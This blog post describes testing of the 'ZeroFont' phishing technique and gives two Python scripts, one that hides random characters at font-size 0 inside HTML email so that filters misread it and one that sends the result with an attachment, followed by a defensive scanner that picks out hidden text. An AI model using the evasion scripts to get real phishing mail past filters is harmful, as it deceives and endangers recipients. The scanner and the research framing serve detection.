Sunday, September 30, 2018

ZeroFont Vulnerability Testing and PoC - Updated

Recently a friend of mine published an article called "The ZeroFont Exploit Continues". He referenced a link at the following location, "http://www.avanan.com/resources/zerofont-phishing-attack". From this research I was testing to see if I could send a similar email to myself. Though I did not formulate a phishing email, I used the above tactics to send a message and it went through.

Below are the scripts that I used to test how "The ZeroFont Exploit Continues"...

#!/usr/bin/env python3

# Allow the first 50 characters of the message to not have zero fonts.
# Allow for if a link is found within the message to keep the link intact
# (nothing between '<' and '>' is padded, so tags and the URLs inside them survive).

import random

alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
messageSpacing = 50  # How many characters from the beginning to not encode
newMessage = ''
with open('message.txt', 'r') as f:
    for line in f:
        letterCount = 0
        counter = random.randint(1, 4)  # visible letters to pass before the next hidden span
        htmlChar = False                # True while inside an HTML tag
        for letter in line.replace('\n', ''):
            newMessage += letter
            if letter == '<':
                htmlChar = True
                letterCount += 1
                messageSpacing -= 1
            elif letter == '>':
                htmlChar = False
                letterCount += 1
                messageSpacing -= 1
            elif not htmlChar:
                if messageSpacing > 0:
                    messageSpacing -= 1
                elif letterCount >= counter:
                    letterCount = 0
                    counter = random.randint(1, 4)
                elif letterCount == 1:
                    # Insert 3-12 random characters that render at zero size
                    randStr = ''
                    for i in range(random.randint(3, 12)):
                        randStr += random.choice(alphabet)
                    #newMessage += '<span style="FONT-SIZE: 0px">' + randStr + '</span>'
                    newMessage += '<span style="font-size:0px;color:transparent">' + randStr + '</span>'
                    letterCount += 1
                else:
                    letterCount += 1
        newMessage += '<br />'

print("<html><body>")
print(newMessage)
print("</body></html>")

---
Script to send the Email
---

#!/usr/bin/env python3

import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders

fromAddress = 'from_email'
toAddress = 'to_email'
username = 'username'
password = 'password'

msg = MIMEMultipart('alternative')
msg['Subject'] = "ZeroFont Exploit"
msg['From'] = fromAddress
msg['To'] = toAddress

# Attach the HTML Message (the generator's output, saved to a file named 't')
htmlMsg = ''
with open('t', 'r') as f:
    for line in f:
        htmlMsg += line.strip()
htmlPart = MIMEText(htmlMsg, 'html')
msg.attach(htmlPart)

# Attach an Attachment (a file named 'script' in the current directory)
with open('script', 'rb') as f:
    filePart = MIMEBase('application', 'octet-stream')
    filePart.set_payload(f.read())
encoders.encode_base64(filePart)
filePart.add_header('Content-Disposition', "attachment; filename=script")
msg.attach(filePart)

server = smtplib.SMTP('smtp.server.com', 1527)
server.starttls()
server.login(username, password)
server.sendmail(fromAddress, toAddress, msg.as_string())
server.quit()

These scripts are meant to assist security researchers in thwarting the email-filter weakness that phishing emails exploit with this technique.
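As a defender-side complement, added here and not part of the original post, the following Python 3 scanner separates the text a recipient actually sees from the filler hidden at font-size 0 (it recognises both span styles the generator above emits), so a filter can match rules against the visible text and flag the hidden fragments. The SAMPLE body is constructed for this example.

```python
import re
from html.parser import HTMLParser

# A CSS font-size of zero in any unit: "0", "0px", "0.0pt", "0em", "0%" ...
ZERO_SIZE = re.compile(r"^0+(\.0+)?(px|pt|em|rem|%)?$", re.IGNORECASE)
VOID_TAGS = {"br", "hr", "img", "input", "meta", "link"}  # never have an end tag

def has_zero_font(style):
    """True if an inline style declaration sets font-size to zero (any case)."""
    for decl in style.split(";"):
        if ":" in decl:
            prop, value = decl.split(":", 1)
            if prop.strip().lower() == "font-size" and ZERO_SIZE.match(value.strip()):
                return True
    return False

class ZeroFontScanner(HTMLParser):
    """Split an HTML body into rendered text and text hidden at font-size 0."""
    def __init__(self):
        super().__init__()
        self.stack = []          # one flag per open element: zero-font or not
        self.visible = []        # text fragments the recipient actually sees
        self.hidden = []         # text fragments rendered at zero size
        self.zero_font_tags = 0  # number of elements carrying a zero font-size

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        zero = has_zero_font(dict(attrs).get("style") or "")
        self.zero_font_tags += int(zero)
        self.stack.append(zero)

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self.stack:
            self.stack.pop()

    def handle_data(self, data):
        # Text under any zero-font ancestor is invisible to the reader
        (self.hidden if any(self.stack) else self.visible).append(data)

def scan_html_body(html):
    """Return (visible_text, hidden_fragments, zero_font_tag_count)."""
    scanner = ZeroFontScanner()
    scanner.feed(html)
    scanner.close()
    return "".join(scanner.visible), scanner.hidden, scanner.zero_font_tags

# Constructed sample in the shape the generator script above emits
SAMPLE = ('<html><body>Ple<span style="font-size:0px;color:transparent">xKq9</span>'
          'ase ver<span style="FONT-SIZE: 0px">abc</span>ify your account<br /></body></html>')
```

A non-zero third element is itself a strong signal for a mail filter, since legitimate HTML mail almost never sets font-size to zero on inline text.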
